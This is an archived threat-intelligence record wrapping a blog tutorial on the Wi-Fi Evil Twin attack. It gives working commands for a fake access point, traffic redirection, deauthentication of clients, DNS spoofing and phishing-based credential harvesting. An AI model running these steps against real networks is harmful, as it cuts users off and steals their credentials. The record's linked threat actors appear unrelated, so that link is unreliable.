{
	"id": "6846f02e-58f9-465b-804a-bbe59b6aec52",
	"created_at": "2026-04-06T00:06:32.337083Z",
	"updated_at": "2026-04-10T13:12:55.210472Z",
	"deleted_at": null,
	"sha1_hash": "24cb253084aa70e6473b5b0fb23463c304fe89e7",
	"title": "Wireless Security— Evil Twin Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1556055,
	"plain_text": "Wireless Security— Evil Twin Attack\r\nBy Kavishka Gihan\r\nPublished: 2021-08-08 · Archived: 2026-04-05 15:45:14 UTC\r\nIn this article, I am going to walk you through and explain the famous “Evil Twin Attack”. It is one of the most\r\npopular wireless attacks in the wild. I will also showcase how you can conduct a DNS spoofing attack\r\nagainst the clients.\r\nFor this attack, you will need a Linux-based operating system (I prefer Kali Linux), a wireless adapter that\r\nsupports monitor mode, aircrack-ng, dhcpd and dnschef. If you don’t have any of these tools, you can install them\r\nwith apt.\r\napt install aircrack-ng\r\napt install dnschef\r\napt install isc-dhcp-server\r\nor get them from the GitHub repositories below.\r\nI am going to assume that you have some knowledge of the basics of WiFi. But I will try to explain the\r\nmethodology in general as we go, and here are some resources that will help get you on track.\r\nYou can get the required configuration files and other setup files from my GitHub repo.\r\nhttps://github.com/kavishkagihan/Evil-Twin-Attack\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\n\nWhat is an Evil Twin attack?\r\nThis is a method of attacking WiFi networks based on impersonation. In this attack, the attacker hosts a\r\nfake access point impersonating the real one. Then the clients are tricked or rather forced to connect to the\r\nfake access point so that the attacker can control the client’s activity.\r\nStill confused? Look at the diagram below.\r\nHere we have a client connected to a router with the SSID (basically the name) of Cafewifi. Note that this\r\nrouter is on channel 6. We also have an attacker on the right side hosting an AP (Access Point) on channel 11. And\r\nif you look closely, the SSID of that AP is the same as the real router’s.\r\nThis is what we call an Evil Twin. 
Since the Evil Twin or the fake AP has the same SSID, there is a chance that\r\nclients may think that this is the real router and connect to it.\r\nCool, Okay… But what if no one connects to our fake AP? What if they realize that this is a fake one and they\r\nconnect to the real one? That is where the deauthentication attack comes into play.\r\nWhat is a deauthentication attack?\r\nTo understand this, let’s see what happens under the hood. Whenever you disconnect your device from a WiFi\r\nnetwork, your device sends a packet (a message basically) to the router called a Deauthentication packet.\r\nThis packet tells the router “Hey man, I am going to disconnect now. So remove my connection”. Something like\r\nthat. Then the router checks if such a connection exists by looking at the MAC address of the packet’s source\r\n(the sender). If it finds one, it sends another packet saying “Okay. Now you are disconnected.” and just removes\r\nthat connection.\r\nIn the deauthentication attack, an attacker sends or broadcasts deauthentication\r\npackets as if they were coming from the clients. So when the router receives these packets, it looks at the source\r\nMAC addresses of the packets and just disconnects the associated clients. The main reason this is possible is\r\nthat these packets require no encryption.\r\nYou might be wondering how we use this to make the client connect to our AP. As we disconnect the clients\r\nfrom the real network via a deauth attack, they automatically try to reconnect to other networks they find.\r\nSince our AP has a better connection than the real router and our AP is an open one, the client will connect back to us.\r\nBut nowadays, most network devices are configured not to connect to an open network without any user\r\ninteraction. 
Nonetheless, there is a good chance of even the user getting tricked and connecting to the fake AP.\r\nBuilding the attack\r\nNow that you have a basic understanding of how this attack works, let’s start building our Evil Twin.\r\nWell, it’s not as simple as you saw in the diagrams. There are a couple of things that you have to configure in\r\norder for your attack to work.\r\n1. An Access Point\r\n2. A DHCP server\r\n3. A DNS server\r\nAs we discussed, we have to impersonate the Access Point and make the clients connect to us instead of the real\r\nrouter. Then the DHCP server is used to give out IP addresses to the clients and let them have a connection with\r\nthe AP. With the DNS server, we resolve the hostnames that our clients look up to IP addresses.\r\nAdditionally, as I mentioned, I will showcase how you can perform a DNS spoofing attack with\r\ndnschef.\r\nSetting up the wireless adapter\r\nFirst of all, we have to see what wireless adapters are connected. By default the adapter is in managed mode.\r\niwconfig\r\nI have my adapter connected as wlan0. Then we have to change the wireless adapter to monitor mode. We can\r\nchange it with airmon-ng, a part of aircrack-ng.\r\nsudo airmon-ng start wlan0\r\nNow it is in monitor mode. You can check it with “iwconfig” again.\r\nAnd the interface name is the same as before. Yours may be wlan0mon or mon0 or something like that.\r\nMonitoring the network\r\nNow we have to pick up some details about our target AP by monitoring the networks around us. For that, you can use\r\nairodump-ng.\r\nsudo airodump-ng wlan0\r\nHere is my target. 
The ESSID is “HackMe”, the BSSID (MAC) is “AA:BB:CC:DD:EE:FF”, and the channel is 11.\r\nNow you can target this one and monitor that router specifically.\r\nsudo airodump-ng --bssid \"AA:BB:CC:DD:EE:FF\" -c 11 wlan0\r\nAs you can see, we have a client connected.\r\nSetting up the Access Point\r\nFor this I am using a tool called airbase-ng, also a part of aircrack-ng. If you want more control of the access\r\npoint you can use hostapd as well.\r\nsudo airbase-ng -e \"HackMe\" -c 10 wlan0\r\nHere we are setting the ESSID to be the same as our target’s, but not the channel. You can verify that your AP is\r\nenabled by just looking at the available WiFi settings or using the Windows Command Prompt.\r\nnetsh wlan show networks\r\nSetting up the interface and the IP table\r\nNow let’s go ahead and set up our interface and some IP rules so that we can forward and redirect traffic from our\r\nAP to the other interface (eth0).\r\nIf you look at the current interfaces you have, you will see that there is an interface called at0.\r\nifconfig at0\r\nThis is generated by airbase-ng. For it to be usable, we have to assign it an IP and a subnet.\r\nsudo ifconfig at0 192.168.10.1 netmask 255.255.255.0\r\nsudo ifconfig at0 mtu 1400\r\nsudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1\r\nNow if you look at that interface you will see that an IP and a netmask are assigned to it.\r\nAfter that, you can add an IP rule with iptables so that it allows traffic to flow from the AP interface (at0) to the\r\nEthernet interface (eth0) or maybe another WiFi interface. 
And if you don’t want your clients to have internet\r\naccess you can skip this step.\r\nsudo echo 1 \u003e /proc/sys/net/ipv4/ip_forward\r\nsudo iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.10.1\r\nsudo iptables -P FORWARD ACCEPT\r\nsudo iptables --append FORWARD --in-interface at0 -j ACCEPT\r\nsudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE\r\nsudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 80\r\nsudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 80\r\n(Note that you will have to run the sudo echo 1 \u003e /proc/sys/net/ipv4/ip_forward command as root.)\r\nThis will add the specific IP rule and redirect port 80 of the AP interface (at0) to our local port 80. (Feel free to\r\nchange the \"--to-port 80\" value.)\r\nIf you need to forward any other ports, for example port 21 (FTP), you can do that by adding a new rule just like\r\nthe last one with --destination-port set to 21.\r\nSetting up the DHCP server\r\nAs mentioned, I will be using isc-dhcpd as my DHCP server. You can just feed it a config file and run it with\r\nthat.\r\ndhcpd.conf\r\nauthoritative;\r\ndefault-lease-time 600;\r\nmax-lease-time 7200;\r\nsubnet 192.168.10.0 netmask 255.255.255.0 {\r\noption routers 192.168.10.1;\r\noption subnet-mask 255.255.255.0;\r\noption domain-name \"HakeMe\";\r\noption domain-name-servers 192.168.10.1;\r\nrange 192.168.10.2 192.168.10.40;\r\n}\r\nThis is the content of the config file. You can save it however you want.\r\nHere, I have specified some important fields. The “option domain-name” field sets the name of the domain.\r\n“option domain-name-servers” is used to specify the DNS server. “range” is the host range that is allowed.\r\nThis is a very simple configuration that I have used. 
But if you want more features to be added, you can check out\r\nthis documentation.\r\nAfter you are done with the configuration file, save it and start the server.\r\nsudo dhcpd -cf dhcpd.conf -pf /var/run/dhcpd.pid at0\r\nThe “-pf” flag will save the process ID of the DHCP server in case you want to kill it.\r\nNow we are done with setting up the Access Point and the DHCP server. Now you can run airodump-ng again.\r\nsudo airodump-ng -c 10 wlan0\r\nAnd we can see our AP is up and running.\r\nPerforming the deauth attack\r\nNow it is time to perform the deauthentication attack and connect our victim back to us. I will use aireplay-ng for\r\nthis.\r\nAs we saw before, our victim is connected to the real router. Now I am going to start airodump-ng on the real AP at\r\nthe same time and perform the deauth attack.\r\nsudo airodump-ng --bssid \"AA:BB:CC:DD:EE:FF\" -c 10 wlan0\r\nWe have the victim client still connected. Now let’s start our deauth attack. Make sure you provide the MAC\r\naddress of the real AP, not the fake one we made.\r\nsudo aireplay-ng --deauth 0 -a \"aa:bb:cc:dd:ee:ff\" -e \"HackMe\" wlan0\r\nNow the victim should be disconnected from the real router and connected back to us. Let’s see if it did.\r\nBOOM!!! Yes, it did. And just like that I disconnected the client from the real AP and connected it back to mine.\r\nDNS Spoofing with dnschef\r\nLet’s get to the fun part. With dnschef you can make them go anywhere you want.\r\nsudo dnschef --interface 192.168.10.1 --fakeip 192.168.10.1 --fakedomain *.ikea.com,*.starbucks.com\r\nIn this case, when the client tries to go to ikea.com or starbucks.com, he will be redirected to the gateway,\r\nwhich is our AP. 
Therefore, you can start a webserver on port 80, as we forwarded the interface port 80 to our\r\nlocal port 80 (in the IP rules).\r\nsudo service apache2 start\r\nLet the victim go to ikea.com or any other domain that you have specified.\r\nAs you can see, dnschef is answering the DNS queries for www.ikea.com with 192.168.10.1\r\nAnd if you look at the victim’s web browser you will see that he is indeed redirected to our Apache server.\r\nNow you can see the power of this attack. For example, you can host a phishing page of Facebook on your server\r\nand spoof DNS to redirect any queries for facebook.com to your IP. As a result, you will be able to do credential\r\nharvesting as well.\r\nActually, there is another version of this “Evil Twin” attack called the “Karma Attack”. That attack is somewhat\r\nsimpler than this one but will need some of the basic knowledge that we discussed. I will showcase that attack in a\r\nfuture article.\r\nIf you have any questions, make sure to leave them down in the comments and I will try my best to answer.\r\nHappy hacking !!!\r\nSource: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59"
	],
	"report_names": [
		"wireless-security-evil-twin-attack-d3842f4aef59"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-10T02:00:04.721082Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.pdf",
		"text": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.txt",
		"img": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.jpg"
	}
}